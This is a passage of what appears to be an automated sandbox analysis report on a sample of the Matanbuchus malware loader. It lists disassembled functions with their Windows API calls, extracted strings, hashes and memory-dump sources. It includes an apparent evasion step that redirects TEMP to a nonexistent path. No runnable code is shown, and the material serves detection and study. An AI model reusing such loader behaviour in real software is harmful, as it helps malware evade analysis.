                      • Opcode ID: 4c2e58f4092fca5b465284512e74bdd03b4ad50ca77ffcdcd6af2eb94fbfed9f
                      • Instruction ID: 17fa358f23440e5f937b09e8fc39b159d9b749cb8f583fcdcb888909f06af4f5
                      • Opcode Fuzzy Hash: 4c2e58f4092fca5b465284512e74bdd03b4ad50ca77ffcdcd6af2eb94fbfed9f
                      • Instruction Fuzzy Hash: CC128F7A905224DFDB14CFAAC990BADBFF1FB48321F28815EE409A7245D3349990CF64
                      Function 7F36271B Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 415COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(comdlg32), ref: 7F3627FC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$APPLY_ALL_SHIMS$O$comdlg32
                      • API String ID: 4139908857-4053425171
                      • Opcode ID: 22aad6b597c6a1335edb31e2edf4a3118f28b68590b1e4877ca35d7a1d921ced
                      • Instruction ID: 7da8a0ed26c07de2e97515089677d65ff971ce876b8d057965746a743e9d043e
                      • Opcode Fuzzy Hash: 22aad6b597c6a1335edb31e2edf4a3118f28b68590b1e4877ca35d7a1d921ced
                      • Instruction Fuzzy Hash: 7F128D79901228DFDB14CF6AC9907ADBFF2FB48325F28815AE409A7346D3349990CF65
                      Function 6D0AB740 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB777
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6D0AB77F
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB808
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6D0AB833
                      • _ValidateLocalCookies.LIBCMT ref: 6D0AB888
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm$csm
                      • API String ID: 1170836740-3733052814
                      • Opcode ID: 16b58d4ff41518c816ce7ce179087e4fc4be461b04e7af8678579835ed4337d9
                      • Instruction ID: 9e7b4876fcf31dcf186235feae520c6965a3c8b66d12741620733929e4a48382
                      • Opcode Fuzzy Hash: 16b58d4ff41518c816ce7ce179087e4fc4be461b04e7af8678579835ed4337d9
                      • Instruction Fuzzy Hash: 72518134A0520DAFEF00DFA8C840BAE7BF5FF45324F198199D9195B292D771DA11CB91
                      Function 7F356560 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 197COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: -0LRRMS$4$N$c.
                      • API String ID: 0-722310019
                      • Opcode ID: 68d5fb756ad9812aa071d14c97ea600215cba44bac1a14391202fedcf18f7bd7
                      • Instruction ID: 9577be5c7eebc7c46d9a1ada2777df422aad22d8b13bcdc98037752d3778c96a
                      • Opcode Fuzzy Hash: 68d5fb756ad9812aa071d14c97ea600215cba44bac1a14391202fedcf18f7bd7
                      • Instruction Fuzzy Hash: 20914774D04288DFEB01CFA8C884BEEBBB5AF99304F204159E549BB381D7B56A45CF61
                      Function 7F3635FD Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 203stringCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$ErrorLast
                      • String ID: Directoryexpansion$FailedtocreateJson$h"$tFailedtoaddbootent
                      • API String ID: 2393612546-3496758782
                      • Opcode ID: 2bf7036b7fd011fe66bbba859d6fd11f1936b8fc593bbfe8aa184b183fb37bd3
                      • Instruction ID: b39793f5a66c7100b2af8866f4a73ff29b1b7ce4e0758974a4211549dd19d549
                      • Opcode Fuzzy Hash: 2bf7036b7fd011fe66bbba859d6fd11f1936b8fc593bbfe8aa184b183fb37bd3
                      • Instruction Fuzzy Hash: 1F91C2BAC04268DBDB04CF69C8507ADBFF6BB58311F28814EE445A7349D7389995CF24
                      Function 7F3B3F30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                      Download Yara Rule
                      APIs
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FAF
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FC9
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FE3
                      • std::bad_exception::bad_exception.LIBCMTD ref: 7F3B3FFD
                      Strings
                      • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F3B4019
                      • false, xrefs: 7F3B401E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::bad_exception::bad_exception
                      • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                      • API String ID: 2160870905-4036550669
                      • Opcode ID: 52862a32266abc44aece405a08ecf5fb4ab3c66b2663039958427d9cdcb6656e
                      • Instruction ID: 3978792922ee5cdd4681219c5b6a9cfc2cebca8f3c1f14a7f13a8d3ff43c4a9a
                      • Opcode Fuzzy Hash: 52862a32266abc44aece405a08ecf5fb4ab3c66b2663039958427d9cdcb6656e
                      • Instruction Fuzzy Hash: B7214F72A04348EBDB04EFA4C890DFEB7B9FB84300F14869DF9516B254DB35AA16DB14
                      Function 7F3E44DC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,7F334A48,?,1AF1C1E0,?,7F3E45E9,7F334A48,7F3D0C75,7F334A48,00000000), ref: 7F3E459D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: ad17a271a347cdbd696470520096833d922f680c7e647075df25063ef6cae538
                      • Instruction ID: 5324c472b88a343495912302320cbad269eff416598facb0ddc15ba708bb0dd5
                      • Opcode Fuzzy Hash: ad17a271a347cdbd696470520096833d922f680c7e647075df25063ef6cae538
                      • Instruction Fuzzy Hash: 6921847EA05325ABD7129A75DC44B8A376DAF49371F250264E916AB2C0D730F911C7E0
                      Function 7F35FA70 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 373COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(advapi32,FFFF736A,FFFFFFFF,?,B397561A,FFFFB705,00000000,901EAF8D,00000000,00000000,00000000,FFFF7D9A,FFFFFFFF,FFFFB705,00000000,FFFFB705), ref: 7F360308
                      • GetOEMCP.KERNEL32(?,?,?,FFFF7D9A,FFFFFFFF,?,-000043C9), ref: 7F360518
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$advapi32$m$tFailedtoaddbootent
                      • API String ID: 4139908857-1105196973
                      • Opcode ID: a5c45995d68d2c54fdda485092d735e44f6f2525fdc2cc1e9e07bdcc690c6c46
                      • Instruction ID: 587b45756bbe37f32445833efeecb457d330c4880fce086f24688c12b60c3570
                      • Opcode Fuzzy Hash: a5c45995d68d2c54fdda485092d735e44f6f2525fdc2cc1e9e07bdcc690c6c46
                      • Instruction Fuzzy Hash: 43027B7A904268DFDB08CFAAC9907ADBFF5FB48321F28815ED449A7245D7349990CF60
                      Function 7F3DF6F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F3DF715
                      • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F3DF727
                      • swprintf.LIBCMT ref: 7F3DF748
                      • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F3DF785
                      Strings
                      • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F3DF73D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleFileHandleTypeWriteswprintf
                      • String ID: Assertion failed: %Ts, file %Ts, line %d
                      • API String ID: 2943507729-1719349581
                      • Opcode ID: f9374ef0a50c62b02c34f04595effa9e6140706b0bee2f5d1876dbb0551a2bdb
                      • Instruction ID: 60bfc5ded175526e9e6c92212af707bc432b6c2463ca8662179d9ea31d93ce81
                      • Opcode Fuzzy Hash: f9374ef0a50c62b02c34f04595effa9e6140706b0bee2f5d1876dbb0551a2bdb
                      • Instruction Fuzzy Hash: 2011047B9002186BCB109F39CC84AEF77BDEF45360F544698FA2697144EA30AD468B64
                      Function 7F363315 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 290COMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1452528299-3689221051
                      • Opcode ID: fb7d3160588e3f22cbd3e662140f6532f1ab064fffcf6aac165cb8e691b07b54
                      • Instruction ID: 306d683fe49c84282cde3b2f16eee86403b401b1763156c6b23870aed6823c0d
                      • Opcode Fuzzy Hash: fb7d3160588e3f22cbd3e662140f6532f1ab064fffcf6aac165cb8e691b07b54
                      • Instruction Fuzzy Hash: 8CD1AC79D05228DBDB14CF6AC4903ADBFF6FB48321F28819AD409A7345E7389995CF20
                      Function 7F363BF5 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 143COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Directoryexpansion$FailedtocreateJson$tFailedtoaddbootent
                      • API String ID: 0-969224555
                      • Opcode ID: fbff084666e8271f81fa954a538d381bf96de820687ea821a0250cd88587783d
                      • Instruction ID: ccc396bf8f8cff137d986b231840abb7cf7960fdb8b62f61745940d7a29b3025
                      • Opcode Fuzzy Hash: fbff084666e8271f81fa954a538d381bf96de820687ea821a0250cd88587783d
                      • Instruction Fuzzy Hash: 7C617D79D05228DBDB18CF69C9907ADBFF6BB48314F28819DE409A7349D7349A90CF24
                      Function 7F345930 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                      Download Yara Rule
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F345957
                      • int.LIBCPMTD ref: 7F345970
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F3459B7
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F345A4B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
                      • Opcode ID: 7a9ef372a09dc195453f4afd8da3dc4e5e7748b257097fa86dbd29bc7dca3deb
                      • Instruction ID: d13a71a00fceed0ac105638d056ea6685b7d417ddd2ae58aecaa5db23ee6348c
                      • Opcode Fuzzy Hash: 7a9ef372a09dc195453f4afd8da3dc4e5e7748b257097fa86dbd29bc7dca3deb
                      • Instruction Fuzzy Hash: 6541B5B5D01609DFCB05CFA8D990AEEBBF5FF48310F208259E815A7390DB346A45CBA1
                      Function 7F3457F0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                      Download Yara Rule
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F345817
                      • int.LIBCPMTD ref: 7F345830
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F345877
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F34590B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
                      • Opcode ID: d5d95942f72178c9d750286200aa55f70e716e4532e19424f72823229b6041c6
                      • Instruction ID: 66573f1128a5e65efc9486bced6e40befd7bf403c98b52e96202d716bf4211b3
                      • Opcode Fuzzy Hash: d5d95942f72178c9d750286200aa55f70e716e4532e19424f72823229b6041c6
                      • Instruction Fuzzy Hash: 634177B5D01619DFCB04CFA8D990AEEBBF5FF48310F208259E915A7390DB346A45CBA1
                      Function 7F3456B0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                      Download Yara Rule
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F3456D7
                      • int.LIBCPMTD ref: 7F3456F0
                        • Part of subcall function 7F34AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F34AA36
                        • Part of subcall function 7F34AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F34AA60
                      • Concurrency::cancel_current_task.LIBCPMTD ref: 7F345737
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F3457CB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                      • String ID:
                      • API String ID: 3053331623-0
                      • Opcode ID: b75cb29af7e99e2058f060401ee0757a302485212b53d6a2c557ba5d9d037639
                      • Instruction ID: fcb362689cff18ece5a650470aa549c5e8683f0d3c968ab991c934ba6c0fc390
                      • Opcode Fuzzy Hash: b75cb29af7e99e2058f060401ee0757a302485212b53d6a2c557ba5d9d037639
                      • Instruction Fuzzy Hash: 3B4199B9D01609DFCB04CFA8D590AEEBBF5FF48310F204269E915A7390D7346A45CBA5
                      Function 7F3D0224 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog3.LIBCMT ref: 7F3D022B
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F3D0236
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F3D02A4
                        • Part of subcall function 7F3D0387: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F3D039F
                      • std::locale::_Setgloballocale.LIBCPMT ref: 7F3D0251
                      • _Yarn.LIBCPMT ref: 7F3D0267
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                      • String ID:
                      • API String ID: 1088826258-0
                      • Opcode ID: b77d6430e1cfc3b2c3164ba6e19add6c59c2b96bc389372ebce87313f57a80b6
                      • Instruction ID: 2b65957f623653be2daeda4e23ea54a368bfc52fc76c07be5093d15b174a1aae
                      • Opcode Fuzzy Hash: b77d6430e1cfc3b2c3164ba6e19add6c59c2b96bc389372ebce87313f57a80b6
                      • Instruction Fuzzy Hash: 840171BBA012159BDB05DF70C8506BD7BB6FFC4760B284009E8125B380CF35AE06DB95
                      Function 7F362ADF Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 306stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenA.KERNEL32(?,00000000,?,00000000,?,FFFF7D9A,FFFFFFFF,C4A18EEC,00019EE8,0000005A,?,783137D2,000B623B), ref: 7F362FBF
                      • IsValidCodePage.KERNEL32(?,00000000,?,00000000,?,FFFF7D9A,FFFFFFFF,C4A18EEC,00019EE8,0000005A,?,783137D2,000B623B), ref: 7F363307
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodeErrorLastPageValidlstrlen
                      • String ID: 4A$APPLY_ALL_SHIMS
                      • API String ID: 608377448-2411809814
                      • Opcode ID: eaba4dc035b382dbe9255ed486484207f67f10d1c2bcc88cd7afe4ace6ba6371
                      • Instruction ID: 2cc40be3939287b0de9eff0cc1f127bc39565e676d6517b3c025b1f66af01adf
                      • Opcode Fuzzy Hash: eaba4dc035b382dbe9255ed486484207f67f10d1c2bcc88cd7afe4ace6ba6371
                      • Instruction Fuzzy Hash: 70E19E7A901224DBDB14CF6AC9907ADBFF2FF48321F28815AE409A7356D3349991CF64
                      Function 6D091500 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                      Download Yara Rule
                      APIs
                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\NonExistentPath), ref: 6D091731
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentVariable
                      • String ID: C:\NonExistentPath$TEMP$}
                      • API String ID: 1431749950-3776891069
                      • Opcode ID: 5deeae651428f5ef84c311c31dbc21a3a76c8ed0c6219acb76b9c5ea7507cde1
                      • Instruction ID: 68fb1c8be6a95aad9b2d75e9baf98903236032424fc50f2cf70300448e738551
                      • Opcode Fuzzy Hash: 5deeae651428f5ef84c311c31dbc21a3a76c8ed0c6219acb76b9c5ea7507cde1
                      • Instruction Fuzzy Hash: D0611278D0A399CEDF14CFA8C4807ADBFB5BF5A304F10919AD858A7391E3710A85CB56
                      Function 7F366E4B Relevance: 6.3, APIs: 4, Instructions: 252COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a139e0eda364d5a09ed5dd1e21d9081fd7d35cdd7b0eaa96061cd7a0d31660d
                      • Instruction ID: 0e4dfe79a95172b7be84d02eb2fb5b4603fac8bdef61c2b6b0be27f53532a5c5
                      • Opcode Fuzzy Hash: 8a139e0eda364d5a09ed5dd1e21d9081fd7d35cdd7b0eaa96061cd7a0d31660d
                      • Instruction Fuzzy Hash: 40C19E79D04628CFDB14CF6AC8907AEBFF1BB49316F24819ED449A7249D7349A81CF20
                      Function 7F363DAE Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: fb415fb47915a147fae232b1b190a0e76bf69ade9eb24d82d5a39f1752d652c8
                      • Instruction ID: d60124e6c23ce1b50f7a55faf2da592728ddfb845b888cfc39415e63ba136227
                      • Opcode Fuzzy Hash: fb415fb47915a147fae232b1b190a0e76bf69ade9eb24d82d5a39f1752d652c8
                      • Instruction Fuzzy Hash: DF51707A915224DBDB14CF66C8807ADBFF5FF98320F28819AE408A7345D7749994CF14
                      Function 7F363AC6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 114stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: 861d28cd2b254f28290d09c27f2b800c822bcc0aa1fbbd75c447150b98bae36c
                      • Instruction ID: 5131917abf405d3e0a76e31a1848bda786825801822fb079b7287f9b86b2343e
                      • Opcode Fuzzy Hash: 861d28cd2b254f28290d09c27f2b800c822bcc0aa1fbbd75c447150b98bae36c
                      • Instruction Fuzzy Hash: E1516C79D05228DBDB08CF95C8906ADBFF6BF98324F28819AE409B7345D7355A90CF24
                      Function 7F363AAE Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: 9c2ebe81e3b1c3eea27a5e866f0a445c659344ae6a2c37fbbd0c8acb4839d000
                      • Instruction ID: d7f0f060b4868760b603ec59b9c24207ecfcc2e869a7032f2857f890d6f408d4
                      • Opcode Fuzzy Hash: 9c2ebe81e3b1c3eea27a5e866f0a445c659344ae6a2c37fbbd0c8acb4839d000
                      • Instruction Fuzzy Hash: BB112C79C05228CBDB18CF65C45069CBBFABB48324F28829ED414BB295D7755A94CF10
                      Function 7F3D9825 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv
                      • String ID: +$-
                      • API String ID: 3732870572-2137968064
                      • Opcode ID: 681c65016d24c7b7105fca5b5203595cbdca8aa8ea371b8417ad98ffbdcbfc7b
                      • Instruction ID: fbd55d47458dc26d5a85cd72cf3d77317f4ba7370ee20ab2e9b43390ed60aca6
                      • Opcode Fuzzy Hash: 681c65016d24c7b7105fca5b5203595cbdca8aa8ea371b8417ad98ffbdcbfc7b
                      • Instruction Fuzzy Hash: 0EA1B373E02359EFCB05CE78C8506EE7BB5EF56624F048659F8A6AF284D234A506CB50
                      Function 7F365940 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetFocus.USER32 ref: 7F365AEC
                      • GetSystemMenu.USER32(00000000,00000001), ref: 7F365B19
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: FocusMenuSystem
                      • String ID: 4A
                      • API String ID: 4096349137-1298712752
                      • Opcode ID: 0eed4be27cc5d86c890d2c6ff64c488937ec0883f24037db492341f159e7c344
                      • Instruction ID: b41dc1ae2063b1844bc35050b50b6b95e1519f3db6a7bb5bea3f5436d163230d
                      • Opcode Fuzzy Hash: 0eed4be27cc5d86c890d2c6ff64c488937ec0883f24037db492341f159e7c344
                      • Instruction Fuzzy Hash: 51A192B9904268DBDB50CF66C8407BEBBF5FF48315F1880AED44AA7249D3349990CF25
                      Function 6D0864F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
